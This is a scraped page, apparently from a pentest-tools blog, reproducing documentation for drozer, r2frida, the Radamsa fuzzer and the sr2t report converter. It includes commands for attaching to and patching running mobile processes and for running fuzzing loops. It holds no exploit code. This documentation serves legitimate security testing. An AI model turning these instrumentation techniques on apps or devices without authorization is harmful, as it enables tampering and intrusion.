> drozer.bat console connect

If using a real device, the IP address of the device on the network must be specified:

On Linux:

$ drozer console connect --server

On Windows:

> drozer.bat console connect --server

You should be presented with a drozer command prompt:

selecting f75640f67144d9a3 (unknown sdk 4.1.1)  

The prompt confirms the Android ID of the device you have connected to, along with the manufacturer, model and Android software version.

You are now ready to start exploring the device.

Command Reference

Command Description
run Executes a drozer module
list Show a list of all drozer modules that can be executed in the current session. This hides modules that you do not have suitable permissions to run.
shell Start an interactive Linux shell on the device, in the context of the Agent process.
cd Mounts a particular namespace as the root of session, to avoid having to repeatedly type the full name of a module.
clean Remove temporary files stored by drozer on the Android device.
contributors Displays a list of people who have contributed to the drozer framework and modules in use on your system.
echo Print text to the console.
exit Terminate the drozer session.
help Display help about a particular command or module.
load Load a file containing drozer commands, and execute them in sequence.
module Find and install additional drozer modules from the Internet.
permissions Display a list of the permissions granted to the drozer Agent.
set Store a value in a variable that will be passed as an environment variable to any Linux shells spawned by drozer.
unset Remove a named variable that drozer passes to any Linux shells that it spawns.


drozer is released under a 3-clause BSD License. See LICENSE for full details.

Contacting the Project

drozer is Open Source software, made great by contributions from the community.

Bug reports, feature requests, comments and questions can be submitted here.

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R2Frida - Radare2 And Frida Better Together

By: Zion3R — March 30th 2024 at 11:30

This is a self-contained plugin for radare2 that allows to instrument remote processes using frida.

The radare project brings a complete toolchain for reverse engineering, providing well maintained functionalities and extend its features with other programming languages and tools.

Frida is a dynamic instrumentation toolkit that makes it easy to inspect and manipulate running processes by injecting your own JavaScript, and optionally also communicate with your scripts.


  • Run unmodified Frida scripts (Use the :. command)
  • Execute snippets in C, Javascript or TypeScript in any process
  • Can attach, spawn or launch in local or remote systems
  • List sections, symbols, exports, protocols, classes, methods
  • Search for values in memory inside the agent or from the host
  • Replace method implementations or create hooks with short commands
  • Load libraries and frameworks in the target process
  • Support Dalvik, Java, ObjC, Swift and C interfaces
  • Manipulate file descriptors and environment variables
  • Send signals to the process, continue, breakpoints
  • The r2frida io plugin is also a filesystem fs and debug backend
  • Automate r2 and frida using r2pipe
  • Read/Write process memory
  • Call functions, syscalls and raw code snippets
  • Connect to frida-server via usb or tcp/ip
  • Enumerate apps and processes
  • Trace registers, arguments of functions
  • Tested on x64, arm32 and arm64 for Linux, Windows, macOS, iOS and Android
  • Doesn't require frida to be installed in the host (no need for frida-tools)
  • Extend the r2frida commands with plugins that run in the agent
  • Change page permissions, patch code and data
  • Resolve symbols by name or address and import them as flags into r2
  • Run r2 commands in the host from the agent
  • Use r2 apis and run r2 commands inside the remote target process.
  • Native breakpoints using the :db api
  • Access remote filesystems using the r_fs api.


The recommended way to install r2frida is via r2pm:

$ r2pm -ci r2frida

Binary builds that don't require compilation will be soon supported in r2pm and r2env. Meanwhile feel free to download the last builds from the Releases page.



  • radare2
  • pkg-config (not required on windows)
  • curl or wget
  • make, gcc
  • npm, nodejs (will be soon removed)

In GNU/Debian you will need to install the following packages:

$ sudo apt install -y make gcc libzip-dev nodejs npm curl pkg-config git


$ git clone
$ cd r2frida
$ make
$ make user-install


  • Install meson and Visual Studio
  • Unzip the latest radare2 release zip in the r2frida root directory
  • Rename it to radare2 (instead of radare2-x.y.z)
  • To make the VS compiler available in PATH (preconfigure.bat)
  • Run configure.bat and then make.bat
  • Copy the b\r2frida.dll into r2 -H R2_USER_PLUGINS


For testing, use r2 frida://0, as attaching to the pid0 in frida is a special session that runs in local. Now you can run the :? command to get the list of commands available.

$ r2 'frida://?'
r2 frida://[action]/[link]/[device]/[target]
* action = list | apps | attach | spawn | launch
* link = local | usb | remote host:port
* device = '' | host:port | device-id
* target = pid | appname | process-name | program-in-path | abspath
* frida://? # show this help
* frida:// # list local processes
* frida://0 # attach to frida-helper (no spawn needed)
* frida:///usr/local/bin/rax2 # abspath to spawn
* frida://rax2 # same as above, considering local/bin is in PATH
* frida://spawn/$(program) # spawn a new process in the current system
* frida://attach/(target) # attach to target PID in current host
* frida://list/usb// # list processes in the first usb device
* frida://apps/usb// # list apps in the first usb device
* frida://attach/usb//12345 # attach to given pid in the first usb device
* frida://spawn/usb//appname # spawn an app in the first resolved usb device
* frida://launch/usb//appname # spawn+resume an app in the first usb device
* frida://attach/remote/ # attach to pid 558 on tcp remote frida-server
Environment: (Use the `%` command to change the environment at runtime)
R2FRIDA_SAFE_IO=0|1 # Workaround a Frida bug on Android/thumb
R2FRIDA_DEBUG=0|1 # Used to debug argument parsing behaviour
R2FRIDA_COMPILER_DISABLE=0|1 # Disable the new frida typescript compiler (`:. foo.ts`)
R2FRIDA_AGENT_SCRIPT=[file] # path to file of the r2frida agent


$ r2 frida://0     # same as frida -p 0, connects to a local session

You can attach, spawn or launch to any program by name or pid, The following line will attach to the first process named rax2 (run rax2 - in another terminal to test this line)

$ r2 frida://rax2  # attach to the first process named `rax2`
$ r2 frida://1234 # attach to the given pid

Using the absolute path of a binary to spawn will spawn the process:

$ r2 frida:///bin/ls
[0x00000000]> :dc # continue the execution of the target program

Also works with arguments:

$ r2 frida://"/bin/ls -al"

For USB debugging iOS/Android apps use these actions. Note that spawn can be replaced with launch or attach, and the process name can be the bundleid or the PID.

$ r2 frida://spawn/usb/         # enumerate devices
$ r2 frida://spawn/usb// # enumerate apps in the first iOS device
$ r2 frida://spawn/usb//Weather # Run the weather app


These are the most frequent commands, so you must learn them and suffix it with ? to get subcommands help.

:i        # get information of the target (pid, name, home, arch, bits, ..)
.:i* # import the target process details into local r2
:? # show all the available commands
:dm # list maps. Use ':dm|head' and seek to the program base address
:iE # list the exports of the current binary (seek)
:dt fread # trace the 'fread' function
:dt-* # delete all traces


r2frida plugins run in the agent side and are registered with the r2frida.pluginRegister API.

See the plugins/ directory for some more example plugin scripts.

[0x00000000]> cat example.js
r2frida.pluginRegister('test', function(name) {
if (name === 'test') {
return function(args) {
console.log('Hello Args From r2frida plugin', args);
return 'Things Happen';
[0x00000000]> :. example.js # load the plugin script

The :. command works like the r2's . command, but runs inside the agent.

:. a.js  # run script which registers a plugin
:. # list plugins
:.-test # unload a plugin by name
:.. a.js # eternalize script (keeps running after detach)


If you are willing to install and use r2frida natively on Android via Termux, there are some caveats with the library dependencies because of some symbol resolutions. The way to make this work is by extending the LD_LIBRARY_PATH environment to point to the system directory before the termux libdir.

$ LD_LIBRARY_PATH=/system/lib64:$LD_LIBRARY_PATH r2 frida://...


Ensure you are using a modern version of r2 (preferibly last release or git).

Run r2 -L | grep frida to verify if the plugin is loaded, if nothing is printed use the R2_DEBUG=1 environment variable to get some debugging messages to find out the reason.

If you have problems compiling r2frida you can use r2env or fetch the release builds from the GitHub releases page, bear in mind that only MAJOR.MINOR version must match, this is r2-5.7.6 can load any plugin compiled on any version between 5.7.0 and 5.7.8.


| radare2 | The radare2 tool, on top of the rest
| io_frida | r2frida io plugin
| frida | Frida host APIs and logic to interact with target
| app | Target process instrumented by Frida with Javascript


This plugin has been developed by pancake aka Sergi Alvarez (the author of radare2) for NowSecure.

I would like to thank Ole André for writing and maintaining Frida as well as being so kind to proactively fix bugs and discuss technical details on anything needed to make this union to work. Kudos

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Radamsa - A General-Purpose Fuzzer

By: Zion3R — March 25th 2024 at 11:30

Radamsa is a test case generator for robustness testing, a.k.a. a fuzzer. It is typically used to test how well a program can withstand malformed and potentially malicious inputs. It works by reading sample files of valid data and generating interestringly different outputs from them. The main selling points of radamsa are that it has already found a slew of bugs in programs that actually matter, it is easily scriptable and, easy to get up and running.


 $ # please please please fuzz your programs. here is one way to get data for it:
$ sudo apt-get install gcc make git wget
$ git clone && cd radamsa && make && sudo make install
$ echo "HAL 9000" | radamsa

What the Fuzz

Programming is hard. All nontrivial programs have bugs in them. What's more, even the simplest typical mistakes are in some of the most widely used programming languages usually enough for attackers to gain undesired powers.

Fuzzing is one of the techniques to find such unexpected behavior from programs. The idea is simply to subject the program to various kinds of inputs and see what happens. There are two parts in this process: getting the various kinds of inputs and how to see what happens. Radamsa is a solution to the first part, and the second part is typically a short shell script. Testers usually have a more or less vague idea what should not happen, and they try to find out if this is so. This kind of testing is often referred to as negative testing, being the opposite of positive unit- or integration testing. Developers know a service should not crash, should not consume exponential amounts of memory, should not get stuck in an infinite loop, etc. Attackers know that they can probably turn certain kinds of memory safety bugs into exploits, so they fuzz typically instrumented versions of the target programs and wait for such errors to be found. In theory, the idea is to counterprove by finding a counterexample a theorem about the program stating that for all inputs something doesn't happen.

There are many kinds of fuzzers and ways to apply them. Some trace the target program and generate test cases based on the behavior. Some need to know the format of the data and generate test cases based on that information. Radamsa is an extremely "black-box" fuzzer, because it needs no information about the program nor the format of the data. One can pair it with coverage analysis during testing to likely improve the quality of the sample set during a continuous test run, but this is not mandatory. The main goal is to first get tests running easily, and then refine the technique applied if necessary.

Radamsa is intended to be a good general purpose fuzzer for all kinds of data. The goal is to be able to find issues no matter what kind of data the program processes, whether it's xml or mp3, and conversely that not finding bugs implies that other similar tools likely won't find them either. This is accomplished by having various kinds of heuristics and change patterns, which are varied during the tests. Sometimes there is just one change, sometimes there a slew of them, sometimes there are bit flips, sometimes something more advanced and novel.

Radamsa is a side-product of OUSPG's Protos Genome Project, in which some techniques to automatically analyze and examine the structure of communication protocols were explored. A subset of one of the tools turned out to be a surprisingly effective file fuzzer. The first prototype black-box fuzzer tools mainly used regular and context-free formal languages to represent the inferred model of the data.


Supported operating systems: * GNU/Linux * OpenBSD * FreeBSD * Mac OS X * Windows (using Cygwin)

Software requirements for building from sources: * gcc / clang * make * git * wget

Building Radamsa

 $ git clone
$ cd radamsa
$ make
$ sudo make install # optional, you can also just grab bin/radamsa
$ radamsa --help

Radamsa itself is just a single binary file which has no external dependencies. You can move it where you please and remove the rest.

Fuzzing with Radamsa

This section assumes some familiarity with UNIX scripting.

Radamsa can be thought as the cat UNIX tool, which manages to break the data in often interesting ways as it flows through. It has also support for generating more than one output at a time and acting as a TCP server or client, in case such things are needed.

Use of radamsa will be demonstrated by means of small examples. We will use the bc arbitrary precision calculator as an example target program.

In the simplest case, from scripting point of view, radamsa can be used to fuzz data going through a pipe.

 $ echo "aaa" | radamsa

Here radamsa decided to add one 'a' to the input. Let's try that again.

 $ echo "aaa" | radamsa

Now we got another result. By default radamsa will grab a random seed from /dev/urandom if it is not given a specific random state to start from, and you will generally see a different result every time it is started, though for small inputs you might see the same or the original fairly often. The random state to use can be given with the -s parameter, which is followed by a number. Using the same random state will result in the same data being generated.

 $ echo "Fuzztron 2000" | radamsa --seed 4
Fuzztron 4294967296

This particular example was chosen because radamsa happens to choose to use a number mutator, which replaces textual numbers with something else. Programmers might recognize why for example this particular number might be an interesting one to test for.

You can generate more than one output by using the -n parameter as follows:

 $ echo "1 + (2 + (3 + 4))" | radamsa --seed 12 -n 4
1 + (2 + (2 + (3 + 4?)
1 + (2 + (3 +?4))
18446744073709551615 + 4)))
1 + (2 + (3 + 170141183460469231731687303715884105727))

There is no guarantee that all of the outputs will be unique. However, when using nontrivial samples, equal outputs tend to be extremely rare.

What we have so far can be used to for example test programs that read input from standard input, as in

 $ echo "100 * (1 + (2 / 3))" | radamsa -n 10000 | bc
(standard_in) 1418: illegal character: ^_
(standard_in) 1422: syntax error
(standard_in) 1424: syntax error
(standard_in) 1424: memory exhausted

Or the compiler used to compile Radamsa:

 $ echo '((lambda (x) (+ x 1)) #x124214214)' | radamsa -n 10000 | ol
> What is 'ó µ'?
> $

Or to test decompression:

 $ gzip -c /bin/bash | radamsa -n 1000 | gzip -d > /dev/null

Typically however one might want separate runs for the program for each output. Basic shell scripting makes this easy. Usually we want a test script to run continuously, so we'll use an infinite loop here:

 $ gzip -c /bin/bash > sample.gz
$ while true; do radamsa sample.gz | gzip -d > /dev/null; done

Notice that we are here giving the sample as a file instead of running Radamsa in a pipe. Like cat Radamsa will by default write the output to stdout, but unlike cat when given more than one file it will usually use only one or a few of them to create one output. This test will go about throwing fuzzed data against gzip, but doesn't care what happens then. One simple way to find out if something bad happened to a (simple single-threaded) program is to check whether the exit value is greater than 127, which would indicate a fatal program termination. This can be done for example as follows:

 $ gzip -c /bin/bash > sample.gz
$ while true
radamsa sample.gz > fuzzed.gz
gzip -dc fuzzed.gz > /dev/null
test $? -gt 127 && break

This will run for as long as it takes to crash gzip, which hopefully is no longer even possible, and the fuzzed.gz can be used to check the issue if the script has stopped. We have found a few such cases, the last one of which took about 3 months to find, but all of them have as usual been filed as bugs and have been promptly fixed by the upstream.

One thing to note is that since most of the outputs are based on data in the given samples (standard input or files given at command line) it is usually a good idea to try to find good samples, and preferably more than one of them. In a more real-world test script radamsa will usually be used to generate more than one output at a time based on tens or thousands of samples, and the consequences of the outputs are tested mostly in parallel, often by giving each of the output on command line to the target program. We'll make a simple such script for bc, which accepts files from command line. The -o flag can be used to give a file name to which radamsa should write the output instead of standard output. If more than one output is generated, the path should have a %n in it, which will be expanded to the number of the output.

 $ echo "1 + 2" > sample-1
$ echo "(124 % 7) ^ 1*2" > sample-2
$ echo "sqrt((1 + length(10^4)) * 5)" > sample-3
$ bc sample-* < /dev/null
$ while true
radamsa -o fuzz-%n -n 100 sample-*
bc fuzz-* < /dev/null
test $? -gt 127 && break

This will again run up to obviously interesting times indicated by the large exit value, or up to the target program getting stuck.

In practice many programs fail in unique ways. Some common ways to catch obvious errors are to check the exit value, enable fatal signal printing in kernel and checking if something new turns up in dmesg, run a program under strace, gdb or valgrind and see if something interesting is caught, check if an error reporter process has been started after starting the program, etc.

Output Options

The examples above all either wrote to standard output or files. One can also ask radamsa to be a TCP client or server by using a special parameter to -o. The output patterns are:

-o argument meaning example
:port act as a TCP server in given port # radamsa -o :80 -n inf samples/*.http-resp
ip:port connect as TCP client to port of ip $ radamsa -o -n inf samples/*.http-req
- write to stdout $ radamsa -o - samples/*.vt100
path write to files, %n is testcase # and %s the first suffix $ radamsa -o test-%n.%s -n 100 samples/*.foo

Remember that you can use e.g. tcpflow to record TCP traffic to files, which can then be used as samples for radamsa.

Related Tools

A non-exhaustive list of free complementary tools:

  • GDB (
  • Valgrind (
  • AddressSanitizer (
  • strace (
  • tcpflow (

A non-exhaustive list of related free tools: * American fuzzy lop ( * Zzuf ( * Bunny the Fuzzer ( * Peach ( * Sulley (

Tools which are intended to improve security are usually complementary and should be used in parallel to improve the results. Radamsa aims to be an easy-to-set-up general purpose shotgun test to expose the easiest (and often severe due to being reachable from via input streams) cracks which might be exploitable by getting the program to process malicious data. It has also turned out to be useful for catching regressions when combined with continuous automatic testing.

Some Known Results

A robustness testing tool is obviously only good only if it really can find non-trivial issues in real-world programs. Being a University-based group, we have tried to formulate some more scientific approaches to define what a 'good fuzzer' is, but real users are more likely to be interested in whether a tool has found something useful. We do not have anyone at OUSPG running tests or even developing Radamsa full-time, but we obviously do make occasional test-runs, both to assess the usefulness of the tool, and to help improve robustness of the target programs. For the test-runs we try to select programs that are mature, useful to us, widely used, and, preferably, open source and/or tend to process data from outside sources.

The list below has some CVEs we know of that have been found by using Radamsa. Some of the results are from our own test runs, and some have been kindly provided by CERT-FI from their tests and other users. As usual, please note that CVE:s should be read as 'product X is now more robust (against Y)'.

CVE program credit
CVE-2007-3641 libarchive OUSPG
CVE-2007-3644 libarchive OUSPG
CVE-2007-3645 libarchive OUSPG
CVE-2008-1372 bzip2 OUSPG
CVE-2008-1387 ClamAV OUSPG
CVE-2008-1412 F-Secure OUSPG
CVE-2008-1837 ClamAV OUSPG
CVE-2008-6536 7-zip OUSPG
CVE-2008-6903 Sophos Anti-Virus OUSPG
CVE-2010-0001 Gzip integer underflow in unlzw
CVE-2010-0192 Acroread OUSPG
CVE-2010-1205 libpng OUSPG
CVE-2010-1410 Webkit OUSPG
CVE-2010-1415 Webkit OUSPG
CVE-2010-1793 Webkit OUSPG
CVE-2010-2065 libtiff found by CERT-FI
CVE-2010-2443 libtiff found by CERT-FI
CVE-2010-2597 libtiff found by CERT-FI
CVE-2010-2482 libtiff found by CERT-FI
CVE-2011-0522 VLC found by Harry Sintonen
CVE-2011-0181 Apple ImageIO found by Harry Sintonen
CVE-2011-0198 Apple Type Services found by Harry Sintonen
CVE-2011-0205 Apple ImageIO found by Harry Sintonen
CVE-2011-0201 Apple CoreFoundation found by Harry Sintonen
CVE-2011-1276 Excel found by Nicolas Grégoire of Agarri
CVE-2011-1186 Chrome OUSPG
CVE-2011-1434 Chrome OUSPG
CVE-2011-2348 Chrome OUSPG
CVE-2011-2804 Chrome/pdf OUSPG
CVE-2011-2830 Chrome/pdf OUSPG
CVE-2011-2839 Chrome/pdf OUSPG
CVE-2011-2861 Chrome/pdf OUSPG
CVE-2011-3146 librsvg found by Sauli Pahlman
CVE-2011-3654 Mozilla Firefox OUSPG
CVE-2011-3892 Theora OUSPG
CVE-2011-3893 Chrome OUSPG
CVE-2011-3895 FFmpeg OUSPG
CVE-2011-3957 Chrome OUSPG
CVE-2011-3959 Chrome OUSPG
CVE-2011-3960 Chrome OUSPG
CVE-2011-3962 Chrome OUSPG
CVE-2011-3966 Chrome OUSPG
CVE-2011-3970 libxslt OUSPG
CVE-2012-0449 Firefox found by Nicolas Grégoire of Agarri
CVE-2012-0469 Mozilla Firefox OUSPG
CVE-2012-0470 Mozilla Firefox OUSPG
CVE-2012-0457 Mozilla Firefox OUSPG
CVE-2012-2825 libxslt found by Nicolas Grégoire of Agarri
CVE-2012-2849 Chrome/GIF OUSPG
CVE-2012-3972 Mozilla Firefox found by Nicolas Grégoire of Agarri
CVE-2012-1525 Acrobat Reader found by Nicolas Grégoire of Agarri
CVE-2012-2871 libxslt found by Nicolas Grégoire of Agarri
CVE-2012-2870 libxslt found by Nicolas Grégoire of Agarri
CVE-2012-2870 libxslt found by Nicolas Grégoire of Agarri
CVE-2012-4922 tor found by the Tor project
CVE-2012-5108 Chrome OUSPG via NodeFuzz
CVE-2012-2887 Chrome OUSPG via NodeFuzz
CVE-2012-5120 Chrome OUSPG via NodeFuzz
CVE-2012-5121 Chrome OUSPG via NodeFuzz
CVE-2012-5145 Chrome OUSPG via NodeFuzz
CVE-2012-4186 Mozilla Firefox OUSPG via NodeFuzz
CVE-2012-4187 Mozilla Firefox OUSPG via NodeFuzz
CVE-2012-4188 Mozilla Firefox OUSPG via NodeFuzz
CVE-2012-4202 Mozilla Firefox OUSPG via NodeFuzz
CVE-2013-0744 Mozilla Firefox OUSPG via NodeFuzz
CVE-2013-1691 Mozilla Firefox OUSPG
CVE-2013-1708 Mozilla Firefox OUSPG
CVE-2013-4082 Wireshark found by cons0ul
CVE-2013-1732 Mozilla Firefox OUSPG
CVE-2014-0526 Adobe Reader X/XI Pedro Ribeiro (
CVE-2014-3669 PHP
CVE-2014-3668 PHP
CVE-2014-8449 Adobe Reader X/XI Pedro Ribeiro (
CVE-2014-3707 cURL Symeon Paraschoudis
CVE-2014-7933 Chrome OUSPG
CVE-2015-0797 Mozilla Firefox OUSPG
CVE-2015-0813 Mozilla Firefox OUSPG
CVE-2015-1220 Chrome OUSPG
CVE-2015-1224 Chrome OUSPG
CVE-2015-2819 Sybase SQL vah_13 (ERPScan)
CVE-2015-2820 SAP Afaria vah_13 (ERPScan)
CVE-2015-7091 Apple QuickTime Pedro Ribeiro (
CVE-2015-8330 SAP PCo agent Mathieu GELI (ERPScan)
CVE-2016-1928 SAP HANA hdbxsengine Mathieu Geli (ERPScan)
CVE-2016-3979 SAP NetWeaver @ret5et (ERPScan)
CVE-2016-3980 SAP NetWeaver @ret5et (ERPScan)
CVE-2016-4015 SAP NetWeaver @vah_13 (ERPScan)
CVE-2016-4015 SAP NetWeaver @vah_13 (ERPScan)
CVE-2016-9562 SAP NetWeaver @vah_13 (ERPScan)
CVE-2017-5371 SAP ASE OData @vah_13 (ERPScan)
CVE-2017-9843 SAP NETWEAVER @vah_13 (ERPScan)
CVE-2017-9845 SAP NETWEAVER @vah_13 (ERPScan)
CVE-2018-0101 Cisco ASA WebVPN/AnyConnect @saidelike (NCC Group)

We would like to thank the Chromium project and Mozilla for analyzing, fixing and reporting further many of the above mentioned issues, CERT-FI for feedback and disclosure handling, and other users, projects and vendors who have responsibly taken care of uncovered bugs.


The following people have contributed to the development of radamsa in code, ideas, issues or otherwise.

  • Darkkey
  • Branden Archer


Issues in Radamsa can be reported to the issue tracker. The tool is under development, but we are glad to get error reports even for known issues to make sure they are not forgotten.

You can also drop by at #radamsa on Freenode if you have questions or feedback.

Issues your programs should be fixed. If Radamsa finds them quickly (say, in an hour or a day) chances are that others will too.

Issues in other programs written by others should be dealt with responsibly. Even fairly simple errors can turn out to be exploitable, especially in programs written in low-level languages. In case you find something potentially severe, like an easily reproducible crash, and are unsure what to do with it, ask the vendor or project members, or your local CERT.


Q: If I find a bug with radamsa, do I have to mention the tool?
A: No.

Q: Will you make a graphical version of radamsa?

A: No. The intention is to keep it simple and scriptable for use in automated regression tests and continuous testing.

Q: I can't install! I don't have root access on the machine!
A: You can omit the $ make install part and just run radamsa from bin/radamsa in the build directory, or copy it somewhere else and use from there.

Q: Radamsa takes several GB of memory to compile!1
A: This is most likely due to an issue with your C compiler. Use prebuilt images or try the quick build instructions in this page.

Q: Radamsa does not compile using the instructions in this page!
A: Please file an issue at if you don't see a similar one already filed, send email ( or IRC (#radamsa on freenode).

Q: I used fuzzer X and found much more bugs from program Y than Radamsa did.
A: Cool. Let me know about it ( and I'll try to hack something X-ish to radamsa if it's general purpose enough. It'd also be useful to get some samples which you used to check how well radamsa does, because it might be overfitting some heuristic.

Q: Can I get support for using radamsa?
A: You can send email to or check if some of us happen to be hanging around at #radamsa on freenode.

Q: Can I use radamsa on Windows?
A: An experimental Windows executable is now in Downloads, but we have usually not tested it properly since we rarely use Windows internally. Feel free to file an issue if something is broken.

Q: How can I install radamsa?
A: Grab a binary from downloads and run it, or $ make && sudo make install.

Q: How can I uninstall radamsa?
A: Remove the binary you grabbed from downloads, or $ sudo make uninstall.

Q: Why are many outputs generated by Radamsa equal?
A: Radamsa doesn't keep track which outputs it has already generated, but instead relies on varying mutations to keep the output varying enough. Outputs can often be the same if you give a few small samples and generate lots of outputs from them. If you do spot a case where lots of equal outputs are generated, we'd be interested in hearing about it.

Q: There are lots of command line options. Which should I use for best results?
A: The recommended use is $ radamsa -o -n 100 samples/*.foo, which is also what is used internally at OUSPG. It's usually best and most future proof to let radamsa decide the details.

Q: How can I make radamsa faster?
A: Radamsa typically writes a few megabytes of output per second. If you enable only simple mutations, e.g. -m bf,bd,bi,br,bp,bei,bed,ber,sr,sd, you will get about 10x faster output.

Q: What's with the funny name?
A: It's from a scene in a Finnish children's story. You've probably never heard about it.

Q: Is this the last question?
A: Yes.


Use of data generated by radamsa, especially when targeting buggy programs running with high privileges, can result in arbitrarily bad things to happen. A typical unexpected issue is caused by a file manager, automatic indexer or antivirus scanner trying to do something to fuzzed data before they are being tested intentionally. We have seen spontaneous reboots, system hangs, file system corruption, loss of data, and other nastiness. When in doubt, use a disposable system, throwaway profile, chroot jail, sandbox, separate user account, or an emulator.

Not safe when used as prescribed.

This product may contain faint traces of parenthesis.

☐ ☆ ✇ KitPloit - PenTest Tools!

Sr2T - Converts Scanning Reports To A Tabular Format

By: Zion3R — March 23rd 2024 at 11:30

Scanning reports to tabular (sr2t)

This tool takes a scanning tool's output file, and converts it to a tabular format (CSV, XLSX, or text table). This tool can process output from the following tools:

  1. Nmap (XML);
  2. Nessus (XML);
  3. Nikto (XML);
  4. Dirble (XML);
  5. Testssl (JSON);
  6. Fortify (FPR).


This tool can offer a human-readable, tabular format which you can tie to any observations you have drafted in your report. Why? Because then your reviewers can tell that you, the pentester, investigated all found open ports, and looked at all scanning reports.


  1. argparse (dev-python/argparse);
  2. prettytable (dev-python/prettytable);
  3. python (dev-lang/python);
  4. xlsxwriter (dev-python/xlsxwriter).


Using Pip:

pip install --user sr2t


You can use sr2t in two ways:

  • When installed as package, call the installed script: sr2t --help.
  • When Git cloned, call the package directly from the root of the Git repository: python -m src.sr2t --help
$ sr2t --help
usage: sr2t [-h] [--nessus NESSUS [NESSUS ...]] [--nmap NMAP [NMAP ...]]
[--nikto NIKTO [NIKTO ...]] [--dirble DIRBLE [DIRBLE ...]]
[--testssl TESTSSL [TESTSSL ...]]
[--fortify FORTIFY [FORTIFY ...]] [--nmap-state NMAP_STATE]
[--nmap-services] [--no-nessus-autoclassify]
[--nessus-autoclassify-file NESSUS_AUTOCLASSIFY_FILE]
[--nessus-tls-file NESSUS_TLS_FILE]
[--nessus-x509-file NESSUS_X509_FILE]
[--nessus-http-file NESSUS_HTTP_FILE]
[--nessus-smb-file NESSUS_SMB_FILE]
[--nessus-rdp-file NESSUS_RDP_FILE]
[--nessus-ssh-file NESSUS_SSH_FILE]
[--nessus-min-severity NESSUS_MIN_SEVERITY]
[--nessus-plugin-name-width NESSUS_PLUGIN_NAME_WIDTH]
[--nessus-sort-by NESSUS_SORT_BY]
[--nikto-description-width NIKTO_DESCRIPTION_WIDTH]< br/> [--fortify-details] [--annotation-width ANNOTATION_WIDTH]

Converting scanning reports to a tabular format

optional arguments:
-h, --help show this help message and exit
--nmap-state NMAP_STATE
Specify the desired state to filter (e.g.
--nmap-services Specify to ouput a supplemental list of detected
Specify to not autoclassify Nessus results.
--nessus-autoclassify-file NESSUS_AUTOCLASSIFY_FILE
Specify to override a custom Nessus autoclassify YAML
--nessus-tls-file NESSUS_TLS_FILE
Specify to override a custom Nessus TLS findings YAML
--nessus-x509-file NESSUS_X509_FILE
Specify to override a custom Nessus X.509 findings
YAML file.
--nessus-http-file NESSUS_HTTP_FILE
Specify to override a custom Nessus HTTP findings YAML
--nessus-smb-file NESSUS_SMB_FILE
Specify to override a custom Nessus SMB findings YAML
--nessus-rdp-file NESSUS_RDP_FILE
Specify to override a custom Nessus RDP findings YAML
--nessus-ssh-file NESSUS_SSH_FILE
Specify to override a custom Nessus SSH findings YAML
--nessus-min-severity NESSUS_MIN_SEVERITY
Specify the minimum severity to output (e.g. 1).
--nessus-plugin-name-width NESSUS_PLUGIN_NAME_WIDTH
Specify the width of the pluginid column (e.g. 30).
--nessus-sort-by NESSUS_SORT_BY
Specify to sort output by ip-address, port, plugin-id,
plugin-name or severity.
--nikto-description-width NIKTO_DESCRIPTION_WIDTH
Specify the width of the description column (e.g. 30).
--fortify-details Specify to include the Fortify abstracts, explanations
and recommendations for each vulnerability.
--annotation-width ANNOTATION_WIDTH
Specify the width of the annotation column (e.g. 30).
-oC OUTPUT_CSV, --output-csv OUTPUT_CSV
Specify the output CSV basename (e.g. output).
-oT OUTPUT_TXT, --output-txt OUTPUT_TXT
Specify the output TXT file (e.g. output.txt).
-oX OUTPUT_XLSX, --output-xlsx OUTPUT_XLSX
Specify the outpu t XLSX file (e.g. output.xlsx). Only
for Nessus at the moment
-oA OUTPUT_ALL, --output-all OUTPUT_ALL
Specify the output basename to output to all formats
(e.g. output).

specify at least one:
--nessus NESSUS [NESSUS ...]
Specify (multiple) Nessus XML files.
--nmap NMAP [NMAP ...]
Specify (multiple) Nmap XML files.
--nikto NIKTO [NIKTO ...]
Specify (multiple) Nikto XML files.
--dirble DIRBLE [DIRBLE ...]
Specify (multiple) Dirble XML files.
--testssl TESTSSL [TESTSSL ...]
Specify (multiple) Testssl JSON files.
--fortify FORTIFY [FORTIFY ...]
Specify (multiple) HP Fortify FPR files.


A few examples


To produce an XLSX format:

$ sr2t --nessus example/nessus.nessus --no-nessus-autoclassify -oX example.xlsx

To produce an text tabular format to stdout:

$ sr2t --nessus example/nessus.nessus
| host | port | plugin id | plugin name | severity | annotations |
| | 3389 | 42873 | SSL Medium Strength Cipher Suites Supported (SWEET32) | 2 | X |
| | 443 | 42873 | SSL Medium Strength Cipher Suites Supported (SWEET32) | 2 | X |
| | 3389 | 18405 | Microsoft Windows Remote Desktop Protocol Server Man-in-the-Middle Weakness | 2 | X |
| | 3389 | 30218 | Terminal Services Encryption Level is not FIPS-140 Compliant | 1 | X |
| | 3389 | 57690 | Terminal Services Encryption Level is Medium or Low | 2 | X |
| | 3389 | 58453 | Terminal Services Doesn't Use Network Level Authentication (NLA) Only | 2 | X |
| | 3389 | 45411 | SSL Certificate with Wrong Hostname | 2 | X |
| | 443 | 45411 | SSL Certificate with Wrong Hostname | 2 | X |
| | 3389 | 35291 | SSL Certificate Signed Using Weak Hashing Algorithm | 2 | X |
| | 3389 | 57582 | SSL Self-Signed Certificate | 2 | X |
| | 3389 | 51192 | SSL Certificate Can not Be Trusted | 2 | X |
| | 3389 | 42873 | SSL Medium Strength Cipher Suites Supported (SWEET32) | 2 | X |
| | 443 | 42873 | SSL Medium Strength Cipher Suites Supported (SWEET32) | 2 | X |
| | 3389 | 18405 | Microsoft Windows Remote Desktop Protocol Server Man-in-the-Middle Weakness | 2 | X |
| | 3389 | 30218 | Terminal Services Encryption Level is not FIPS-140 Compliant | 1 | X |
| | 3389 | 57690 | Terminal Services Encryption Level is Medium or Low | 2 | X |
| | 3389 | 58453 | Terminal Services Doesn't Use Network Level Authentication (NLA) Only | 2 | X |
| | 3389 | 45411 | S SL Certificate with Wrong Hostname | 2 | X |
| | 443 | 45411 | SSL Certificate with Wrong Hostname | 2 | X |
| | 3389 | 35291 | SSL Certificate Signed Using Weak Hashing Algorithm | 2 | X |
| | 3389 | 57582 | SSL Self-Signed Certificate | 2 | X |
| | 3389 | 51192 | SSL Certificate Cannot Be Trusted | 2 | X |
| | 445 | 57608 | SMB Signing not required | 2 | X |

Or to output a CSV file:

$ sr2t --nessus example/nessus.nessus -oC example
$ cat example_nessus.csv
